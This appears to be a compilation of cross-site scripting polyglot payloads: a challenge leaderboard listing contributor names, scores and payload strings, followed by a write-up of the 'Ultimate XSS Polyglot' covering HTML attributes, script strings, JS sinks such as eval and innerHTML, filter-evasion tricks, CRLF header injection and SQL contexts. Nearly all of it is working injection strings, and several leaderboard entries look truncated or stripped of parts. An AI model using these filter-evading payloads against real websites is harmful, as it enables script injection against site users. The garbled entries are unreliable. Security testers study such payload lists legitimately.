<!-- http://polyglot.innerht.ml/ -->
0 crlf 20 141
"/*'/*`/*--></noscript></title></textarea></style><html \" >
1 europa 20 143
"/*'/*`/*\" /*</title></style></textarea></noscript>--><svg/=/*<html/*/>
2 EdOverflow 20 143
"/*\"/*`/*' /*</textarea></noscript></title></style>--><svg =/*<html/*/>
3 h1/ragnar 20 143
//"//\"//</title></textarea></style></noscript><svg/='/*--><html */ >`
4 A. Korzhynskyi 20 143
//"//\"//</title></textarea></style></noscript><svg/='/*--><html */ >`
5 Somdev Sangwan 20 144
/*\"/*--><svg ='/*</noscript></style></title></textarea><html alert()//'">`
6 @trichimtrich 20 144
"/*'//`//\"//
7 tsug0d 20 145
"/*`/*\"/*'/*</stYle/</titLe/</teXtarEa/</nOscript>-->
8 Benoit Esnard 20 146
/template>\"///"//--></title/'</style/</textarea/</noembed/</noscript><`
9 @rawsec 20 146
/template>\"///"//--></title/'</style/</textarea/</noembed/</noscript><`
10 @RakeshMane10 20 149
/*`//'//\"//</style></noscript>--></textarea></title>
11 @TeamBounters 20 149
/*`//'//\"//</style></noscript>--></textarea></title>
12 bounter 20 150
/*"//'//`//\"//--></title></style></textarea></noscript>
13 bayo 20 150
/*-->'//"//`//\"//</title></textarea></style></noscript>
14 n1 20 150
/*"/*'/*`/*\"/*</title/</textarea/</style/</noscript>-->
15 @y0n3uchy 20 150
/*"/*'/*\"/*`/*--></title></textarea></noscript></style>
16 Meerkat 20 152
/*"/*`/*'/*\"/*--></title></textarea></noscript></style>
17 qd (@qd0an) 20 154
"/*'//`//\"//</title><<frame/*/ >
18 i 20 155
()"//</title></textarea></style></noscript>\"//'//`//-->
19 yusuke 20 155
()"//</title></textarea></style></noscript>\"//'//`//-->
20 @m4th3c 20 156
/*"/*`/*'/*\"/*</style></select></title></textarea></noscript><frame/><<svg/*/ >
21 concavang 20 156
"/*`/*\"/*' /*</stYle/</titLe/</teXtarEa/</nOscript></select><FRAME/><<sVg/>
22 kurgm 20 156
/*--></textarea></style></noscript>\"[`["</select>['</title>]<
23 @ommadawn46 20 157
"/*\"/*'/*`/*--></noscript></title></textarea></style></select><frame/><<svg/>
24 Darwin (R0CREW) 20 158
/*"/*`/*'/*\"/*--></title></textarea></noscript></style><<frame >
25 xxx 20 159
"/*\"/*'/*--></title></textarea></style></noscript><<
26 koaidien 20 161
"/*'/*\"/*` /**/alert()//--></title></textarea></style></noscript><svg/<frame/>
27 @giutro 20 164
/*"/*`/*'/*\"/*-->*/ alert()//</title></textarea></style></noscript></select><frame/><<svg/>
28 c 20 167
/*</title></style></textarea></noscript></select/"/'/*--><frame ><svg/\"/*<svg /**/-alert()//'>`
29 yarbabin 20 169
/*`/*\"/*'/*"/*<frame src=/**/;alert()//--></title></textarea></style></noscript></select><<svg/>
30 test 20 170
()//"/*`/*'/*\"/*--></title></textarea></noscript></style>*/ alert()//<frame ><
31 lazarus 20 172
()//'//"//\"//-->`//*/ alert();//</title></textarea></style></noscript><frame ></select><<svg >
32 @KacperSzurek 20 173
/*"/*\"/*`/*'/**/ (alert())//</title></textarea></style></noscript></select><frame src=()--><<svg/>
33 Corb3nik 20 175
/*"/*'/*\"/*`/*><frame src=()><\ /**/alert()//
34 DrStache 20 177
/*`/*'/*'/*"-/*\"/**/ alert()//></title></textarea></style></select></noscript>--><<svg/><frame/src=()>
35 2test 20 179
'/*`/*'/*"/*\"/*<FRAME SRC= /**/-alert()//--></title></textarea></style></noscript>
36 ttt 20 181
()//--></title></style></noscript></select></textarea><frameset >*///\"//`//'//"//><svg <svg > alert()//
37 hoangdoan 20 182
()//'//"//\"; '/`/*\/*'/*"/**/(alert())//</style><frame <svg >
38 n0n4me 20 182
/*"/*'/*`/*\"/**/ alert()//*</title></textarea></style></noscript></select>--><<svg ><frame src=()>
39 @hayakudesu 20 188
()//\"//`//'//"//--></style></select></noscript></title></textarea><iframe/srcdoc="<svg/>"><frame/>*/ alert()//
40 superevr 20 193
()//*-->*`/*'/*"/*\"/*</title></textarea></style></noscript><frame src=()>
41 KuroNeko 20 201
/*`/*\`/*'/*\"//"/**/(=alert())//<svg/=alert()><frame/></select></noscript></stYle/</titLe/</teXtarEa/--><sVg/>
42 zblee 20 201
()//'//"//`//></select></noscript></title></style></textarea>--><<svg >\">alert()//*/ alert()//<frame src=()>
43 BadSpell 20 204
()//\ /*<svg/=';alert();'></textarea></style></title></noscript><frame >-->*/alert()//\";alert()//
44 yappare 20 204
/*`/*\/*'/*\"/*"/**/(alert())// alert()//--><frame/ <img src=x ></style/</title/</textarea/</noscript/</noembed/
45 1024bita 20 209
();//</title></noscript></style></textarea><frameset >\" alert();/*`/**/(/**/alert())//<<svg >>
46 h1_sp1d3r 20 216
()//*/alert()/*'-/"/-eval(`(alert())`)//\"-alert()//--></title></style></noscript></textarea><frameset ><svg/=alert(1)> alert()//
47 dcua 20 232
()//\";alert();/*-/*`/*\`/*'/*"/**///--><FRAME SRC="();"></textarea></style></noscript></select></title><svg/><svg/=alert()> alert(1)//
48 ImGroot 20 234
()//<frame/src=()><svg/=alert()>`;alert()`';alert()//\";alert();//"//--></title></textarea></style></noscript></select><svg >*/ alert()//*
49 kaibro 20 249
()//</title></style></textarea></noscript>alert()</script>-->\";alert()//";alert()//';alert()//<frame src="()">` alert()//<svg/>*/alert()/*
50 Test 20 287
();//<img src=x:x =alert(1)>\";alert();//";alert();//';alert();//`;alert();// alert();//*/alert();//--></title></textarea></style></noscript></select><frame src=()><svg ><!--
51 flint 20 314
/*--></title></style></noscript></textarea><svg/>"><svg/>"><frame src="()"></frameset>+\"; alert()//<img src =alert()>
52 ppp 20 391
(1)//\";alert(1);<!--/*-/*`/*\`/*'/*"/**/(/* */=alert() )//%0D%0A%0d%0a//--><FRAME SRC="(1);"></textarea></style></iframe></noscript></select>![]()
</title>![]()
<img src=x:x =alert(1)> alert(1)//
53 k9 19 143
"/*'//`//\"//
54 xrekkusu 19 165
/*\"+/*<script>//</textarea></noscript></style></title>--><svg/>
55 h45h5h0t 19 179
();//<svg/= alert()>/*"/*'/*`/*\"/**/ alert()();//
56 @h45h5h0t 19 179
();//<svg/= alert()>/*"/*'/*`/*\"/**/ alert()();//
57 titi 19 211
()//'/*`/*"/**/;alert()//%0D%0A-->'>"></title></textarea></style></noscript></select><svg/=alert()><FRAME >\";alert()//<svg/>
58 maxi 18 156
()//<sVg/>\" alert()//
59 nobody 18 198
();//";/*';/*`;/**/ alert(1);//</noscript></style></title></textarea>--><frame src="()"><svg >
60 johndoe1492 18 201
()`-alert()`//'-alert()-'"-alert()-"<FRAME SRC=()//</textarea></title>--></style></noscript>*/alert()/*\"-alert()//
61 Swk 18 204
()//"+alert()//'+alert()//`+alert()//</title></textarea></noscript></style></select>-->'>"><frame src=(1)><svg ><!--*/ alert()//
62 maksimkhazov 18 218
()//</noscript>/*`/*\`/*'/*"/**/(/* */alert())//</style/</titLe/</textarea/--><svg/ src="(1)">
63 tet 18 234
()//;alert();//*/;alert()//;';alert();//";alert();//`;alert();//</title></textarea></style></noscript><frame src=()></select>"'--><svg >\";alert();//
64 Sawa 18 235
"-alert(1)-"'-alert(1)-'\"; alert(1)//<img src=x =alert(1)>*/alert(1)/*${alert(1)}<frame src=(1);></noscript></style></textarea></title>--><svg >
65 aaaa 17 153
";';/*--></title></style></textarea></noscript><svg/ alert(1)//'>
66 shinkbr 17 154
/*'/*\""/*`/**/;alert();//--></title></style></noscript></textarea><frame >
67 sir1ous 17 191
/*`/*'/*"/*\"/**/(alert() )//<frame src=()></noscript><input type=image src=x ></stYle/</titLe/</teXtarEa/--!><sVg/>
68 zairo 17 195
();//`;alert(1)//-->';alert();//";alert()//><frame src="()"></title></textarea></style></noscript><
69 IJustCopyPasted 17 197
<frame src=()>/*`/*'/*"/*\"/**/(alert() )//%d%a</noscript><input type=image src=a ></stYle/</titLe/</teXtarEa/--!><sVg/>
70 Kuromatae 16 125
/*`/*\"/*'/*"/**/(alert())//--></noscript></title></textarea></style>\"
71 webr0ck 16 151
()//`/*"/*'/**/+alert();//--></title></textarea></style></noscript></select><svg/>
72 yia 16 205
-->/*-/*`/*\`/*'/*"/**/(/* */=alert() )//%0D%0A%0d%0a//</title></textarea></iframe></style></noscript><sVg/=alert()//>
73 mooo 16 217
\";alert(1);//";alert();//';alert();//`;alert();//--></title></textarea></style></noscript></frameset>![]()
*/>&>
75 awsm 15 156
</noscript></select>/*-/*`/*\`/*'/*"/**/(/* */=alert())//</stYle/</titLe/</teXtarEa/--!><sVg/>
76 t 15 156
</noscript></select>/*-/*`/*\`/*'/*"/**/(/* */=alert())//</stYle/</titLe/</teXtarEa/--!><sVg/>
77 seth 15 189
(1);//";alert(1);//';alert(1);//`;alert(1);//</select></iframe></noscript></title></textarea></style>">'>-->%26lt;![]()
></textarea></style></noscript></select>--><frame src="(1)">
79 abdilahrf 15 224
/*-/*`/*\`/*'/*"/**/(/* */=alert() )//%0D%0A%0d%0a//'"/*–>]]>%>?></object></title></style></frameset></select></noscript></textarea>!-->>![]()
’
80 ></textarea></style></noscript></frameset></select>-->
81 testing B 14 281
()//<img src=1 =alert()>"=alert() '=alert() </frameset> </noscript></title>--></textarea></style><svg src=1 >'-alert()-';"-alert()-";${alert()}</select>
82 x3b 13 141
*/alert()/*'-->"--></title></textarea></style></noscript><frame src=()>
83 Petingo 13 150
'"--></title></textarea></noscript></style><svg > /*-/*`/*\`'"/**/(/* */=alert() )//%0D%0A%0d%0a//
84 Abc 13 167
()//--><frame src="()"></select></noscript></title></style></textarea>'"><body >
85 byq 12 123
";alert()//--></select></noscript></style></textarea></title>"'><svg/>
86 o_O 12 143
/*-/*`/*`/*'/*'"/**/(/**/=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/--!>\x3csVg/<sVg/>\x3e
87 Cider sweet 12 155
/*-/*`/*\`/*'/*"/**/(/* */=alert() )//%0D%0A%0d%0a//</titLe/</style/</teXtarEa/</noscript/--!>\x3csVg/<sVg/>\x3e
88 lala 12 358
/*\\x3csvG/=alert()\\x3e*/alert()//</stYle/</tiTle/</texTarEa/--!><sVg//*`/*\"/*'/**/(_=alert())//\\
;alert()//'/ >;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoKT4K}}--></select></frameset></noscript></style></textarea></title>';alert();'";alert();"--><svg >
89 loop 11 116
*/";alert();//';alert();//‘;alert();></title></style></textarea>--></noscript><!--
90 jtjisgod 11 124
'"--></title></textarea></noscript></frameset></select></style><svg >'>
91 ww 11 125
</title></textarea></style></noscript></select>'>">'-->
92 Madsi lingling 11 128
</select></style></noscript></textarea></title>'"> -->
93 L 11 128
--></title></style></textarea></noscript></select></frameset></iframe>"//'//><svg/>
94 dorans_blade 11 132
"'></select></frameset></noscript></style></textarea></title>-->![]()
\//>\x3e
96 moe 11 135
"'--><svg > </title></textarea></frameset></style></noscript>
97 0 11 138
"'></title></textarea></style></noscript></frameset></select></iframe>--><svg >
98 jesusohjesus 11 138
">-->'>--></title>--></textarea>--></style>--></noscript>-->-->--></frameset>-->-->
99 Checkium 11 143
/*-/*`/*\`/*'/*"/**/(/* */=alert())//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/--!>\x3csVg/<sVg/>\x3e
100 123 11 144
/*-/*`/*\`/*'/*"/**/(/* */=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/--!>\x3csVg/<sVg/>\x3e
101 borski 11 144
/*-/*`/*\`/*'/*"/**/(/* */=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/--!>\x3csVg/<sVg/>\x3e
102 mvs 11 144
/*-/*`/*\`/*'/*"/**/(/* */=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/--!>\x3csVg/<sVg/>\x3e
103 aa 11 144
/*-/*`/*\`/*'/*"/**/(/* */=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/--!>\x3csVg/<sVg/>\x3e
104 aaron 11 144
/*-/*`/*\`/*'/*"/**/(/* */=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/--!>\x3csVg/<sVg/>\x3e
105 pl0kta 11 144
/*-/*`/*\`/*'/*"/**/(/* */=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/--!>\x3csVg/<sVg/>\x3e
106 dehong 11 144
/*-/*`/*\`/*'/*"/**/(/* */=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/--!>\x3csVg/<sVg/>\x3e
107 asas 11 144
/*-/*`/*\`/*'/*"/**/(/* */=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/--!>\x3csVg/<sVg/>\x3e
108 denis 11 144
/*-/*`/*\`/*'/*"/**/(/* */=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/--!>\x3csVg/<sVg/>\x3e
109 Jozo 11 144
/*-/*`/*\`/*'/*"/**/(/* */=alert() )//%0D%0A%0D%0A//</stYle/</titLe/</teXtarEa/--!>\x3csVg/<sVg/>\x3e
110 gjbae 11 148
/*-/*`/*\`/*'/*"/**/(/* */=alert('') )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/--!>\x3csVg/<sVg/>\x3e
111 polyglot 11 152
/*-/*`/*\`/*'/*"/**/(/* */=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/--!>\x3csVg/<sVg/>\x3epolyglot
112 ja1 11 157
*/" =;alert();//';alert();//‘;alert();></title></style></textarea>--></noscript></frameset><!--
113 003random 11 174
/*-/*`/*\`/*'/*"/**/(/* */=alert(document.domain) )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/--!>\x3csVg/<sVg/>\x3e
114 K 10 88
"'--></noscript></noembed></title></textarea></style>
115 Zajebisty ctf 10 102
"'</title></textarea></style></noscript></select>--><svg/>
116 nobody2 10 114
<!--'<!--"<!--`--></style></title></textarea><body>
117 5unKn0wn 10 117
<!--"'--></title></textarea></style></noscript></frameset></select><svg >
118 p0uts@ 10 143
/*--></title></style></textarea>alert()<svg/>
119 kumagoro 9 95
'"--></title></textarea></style></noscript></frameset><svg >
120 foo 9 97
"'></title></textarea></noscript></frameset>-->*/
121 dumb 9 112
/*--></title></style></textarea><svg/>
122 Dpster 9 113
/*--></title></style></textarea><svg/>
123 001test 9 547
"><svg >/*--></title></textarea></noscript></style>">[img=1]![]()
">#">< src="x">""--!><Svg/>
124 x 8 77
</noscript></style></textarea></title>"'-->![]()
125 ssssss 8 132
"/*'/*`/*--></noscript></title></textarea></style><body \" x=/*<<svg/*/>
126 hello 8 138
'--><svg > /*--></title></style></textarea><svg/>
127 8 157
/*"/*</select></stYle></titLe></teXtarEa/></noScript>`/*'/*\"/*<frameset */ ( )//>xxxxxxxxxxxxxxxx
128 a 7 62
">'>--></textarea></title>
129 nyaan 7 99
*/alert();';alert();//">'></textarea> <!--'--><svg >
130 karlito 7 145
/*-/*`/*\`/*'/*"/**/(/* */=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/--!>\x3csVg/<sVg/>\x3e
131 lol 7 145
/*-/*`/*\`/*'/*"/**/(/* */=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/--!>\x3csVg/<sVg/>\x3e
132 testgbgb 6 52
"'>-->*/</noscript></title>
133 xss 6 114
/*--></title></style></textarea><svg/>
134 kurumi 6 118
"><svg > '--><svg > </textarea><textarea>
135 kritixilithos 5 42
"'--></style><svg >
136 dlr 5 52
'";alert();"></textarea></style><svg >
137 yeeeee 5 339
> ='> "> alert() )
138 @marataziat 4 39
`"*/>'-->
139 BlackGoat 4 47
*/`"'--><!--'"`/*
140 k 4 77
'--><svg > }''{
141 tts 3 30
"'--><svg ><!--
142 tomnomnom 3 33
//"//'//--> <svg >
143 marataziat 3 38
'`"*/ />
144 ali 3 60
<svg/
145 sdf 2 24
'--><svg >
146 SamiaM 2 24
'--><svg >
147 loveOverflow 2 24
'"><svg >
148 thien 2 24
'--><svg >
149 jji 2 24
'--><svg >
150 21 2 24
'--><svg >
151 Mit 2 24
'--><svg >
152 @SecurityMB 2 25
//\" alert()//
153 1 2 26
>
154 zorx 2 27
'--><svg >-->
155 newbuy 2 27
'--><svg />
156 sumfree 2 28
-->
157 Xm17 2 36
</textarea>
158 Damian89 2 36
</noscript>
159 Tagir Z. 2 37
'-->![]()
160 zajebisty ctf 2 47
</frameset>
161 '"/>>![]()
>![]()
162 001test555 2 143
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromChar
<!-- https://github.com/0xsobky/HackVault/wiki/Unleashing-an-Ultimate-XSS-Polyglot -->
HTML contexts covered:
Double-quoted tag attributes:
<input type="text" value="
/*-/*`/*\`/*'/*"/**/(/* */ )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/--!>\x3csVg/<sVg/>\x3e
"></input>
Demo: jsbin.com/dopepi
Single-quoted tag attributes:
<input type='text' value='
/*-/*`/*\`/*'/*"/**/(/* */ )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/--!>\x3csVg/<sVg/>\x3e
'></input>
Demo: jsbin.com/diwedo
Unquoted tag attributes:
<input type=text value=/*-/*`/*\`/*'/*"/**/(/* */ )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/--!>\x3csVg/<sVg/>\x3e></input>
Demo: jsbin.com/zizuvad
Unquoted tag attributes with HTML-escaped values (may require a click):
![]()
href="
/*-/*`/*\`/*'/*">click me
Demo: jsbin.com/kixepi
<math
/*-/*`/*\`/*'/*"/**/(/* */=alert() )//
//</stYle/</titLe/</teXtarEa/--!>\x3csVg/<sVg/>\x3e
">click me</math>
Demo: jsbin.com/bezofuw
<iframe src="
/*-/*`/*\`/*'/*"/**/(/* */=alert() )//
//</stYle/</titLe/</teXtarEa/--!>\x3csVg/<sVg/>\x3e
"></iframe>
Demo: jsbin.com/feziyi
HTML comments:
<!--
/*-/*`/*\`/*'/*"/**/(/* */=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/--!>\x3csVg/<sVg/>\x3e
-->
Demo: jsbin.com/taqizu
Arbitrary common HTML tags:
<title>
/*-/*`/*\`/*'/*"/**/(/* */=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/--!>\x3csVg/<sVg/>\x3e
</title>
Demo: jsbin.com/juzuvu
<style>
/*-/*`/*\`/*'/*"/**/(/* */=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/--!>\x3csVg/<sVg/>\x3e
</style>
Demo: jsbin.com/qonawa
<textarea>
/*-/*`/*\`/*'/*"/**/(/* */=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/--!>\x3csVg/<sVg/>\x3e
</textarea>
Demo: jsbin.com/mecexo
<div>
/*-/*`/*\`/*'/*"/**/(/* */=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/--!>\x3csVg/<sVg/>\x3e
</div>
Demo: jsbin.com/wuvumuh
Script contexts covered:
Double-quoted strings:
var str = "/*-/*`/*\`/*'/*"/**/(/* */=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/--!>\x3csVg/<sVg/>\x3e";
Demo: jsbin.com/coteco
Single-quoted strings:
var str = '/*-/*`/*\`/*'/*"/**/(/* */=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/--!>\x3csVg/<sVg/>\x3e';
Demo: jsbin.com/bupera
Template strings/literals (ES6):
String.raw`/*-/*`/*\`/*'/*"/**/(/* */=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/--!>\x3csVg/<sVg/>\x3e`;
Demo: jsbin.com/rewapay
Regular expression literals:
var re = //*-/*`/*\`/*'/*"/**/(/* */=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/--!>\x3csVg/<sVg/>\x3e/;
Demo: jsbin.com/zepiti
Single-line and multi-line comments:
\x3csVg/<sVg/>\x3e
Demo: jsbin.com/fatorag
\x3csVg/<sVg/>\x3e
*/
Demo: jsbin.com/vovogo
JS sinks:
eval:
eval(location.hash.slice(1));
Demo: https://jsbin.com/qejisu#/*-/*%60/%5C%60/*'/%22/**/(/*%20*/=alert()%20)//%0D%0A%0d%0a//%3C/stYle/%3C/titLe/%3C/teXtarEa/--!%3E%5Cx3csVg/%3CsVg/=alert()//%3E%5Cx3e
setTimeout:
setTimeout(location.search.slice(1));
Demo: https://jsbin.com/qawusa?/*-/*%60/*%5C%60/*'/*%22/**/(/*%20*/=alert()%20)//%0D%0A%0d%0a//%3C/stYle/%3C/titLe/%3C/teXtarEa/--!%3E%5Cx3csVg/%3CsVg/=alert()//%3E%5Cx3e
setInterval:
setInterval(location.search.slice(1));
Demo: https://jsbin.com/colese?/*-/*%60/*%5C%60/*'/*%22/**/(/*%20*/=alert()%20)//%0D%0A%0d%0a//%3C/stYle/%3C/titLe/%3C/teXtarEa/--!%3E%5Cx3csVg/%3CsVg/=alert()//%3E%5Cx3e
Function:
new Function(location.search.slice(1))();
Demo: https://jsbin.com/hizemi?/*-/*%60/*%5C%60/*'/*%22/**/(/*%20*/=alert()%20)//%0D%0A%0d%0a//%3C/stYle/%3C/titLe/%3C/teXtarEa/--!%3E%5Cx3csVg/%3CsVg/=alert()//%3E%5Cx3e
innerHTML/outerHTML and with HTML-escaped strings:
var data = "/*-/*`/*\`/*'/*"/**/(/* */=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/=alert()//>\x3e";
document.documentElement = data;
Demo: jsbin.com/nimokaz
var data = "/*-/*`/*\`/*'/*"/**/(/* */=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/=alert()//>\x3e";
document.head.outerHTML = data;
Demo: jsbin.com/yowivo
var data = "/*-/*`/*\`/*'/*"/**/(/* */=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/=alert()//>\x3e";
(data);
document.close();
Demo: jsbin.com/ruhofi
Event handlers with HTML-escaped values:
<svg /**/(/* */=alert() )//
//</stYle/</titLe/</teXtarEa/--!>\x3csVg/<sVg/>\x3e';
"></svg>
Demo: jsbin.com/puboha
Filter evasion:
As you might have already noticed, the polyglot has been crafted with filter evasion in mind. For instance:
('/\b(?:\w+=)/', '', PAYLOAD);
/*`/*\` bypasses:
preg_replace('/`/', '\`', PAYLOAD);
</stYle/</titLe/</teXtarEa/--!> bypasses:
preg_replace('/<\/\w+>/', '', PAYLOAD);
--!> bypasses:
preg_replace('/-->/', '', PAYLOAD);
<sVg/> bypasses:
preg_replace('/<\w+\s+/', '', PAYLOAD);
Bonus attacking contexts covered:
CRLF-based XSS:
HTTP/1.1 200 OK
Date: Sun, 01 Mar 2016 00:00:00 GMT
Content-Type: text/html; charset=utf-8
Set-Cookie: x=/*-/*`/*\`/*'/*"/**/(/* */ )//
//</stYle/</titLe/</teXtarEa/--!>\x3csVg/<sVg/>\x3e
Error-based SQL injections (yes, SQLi!):
SELECT * FROM Users WHERE Username='/*-/*`/*\`/*'/*"/**/(/* */=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/--!>\x3csVg/<sVg/>\x3e'
SELECT * FROM Users WHERE Username="/*-/*`/*\`/*'/*"/**/(/* */=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/--!>\x3csVg/<sVg/>\x3e"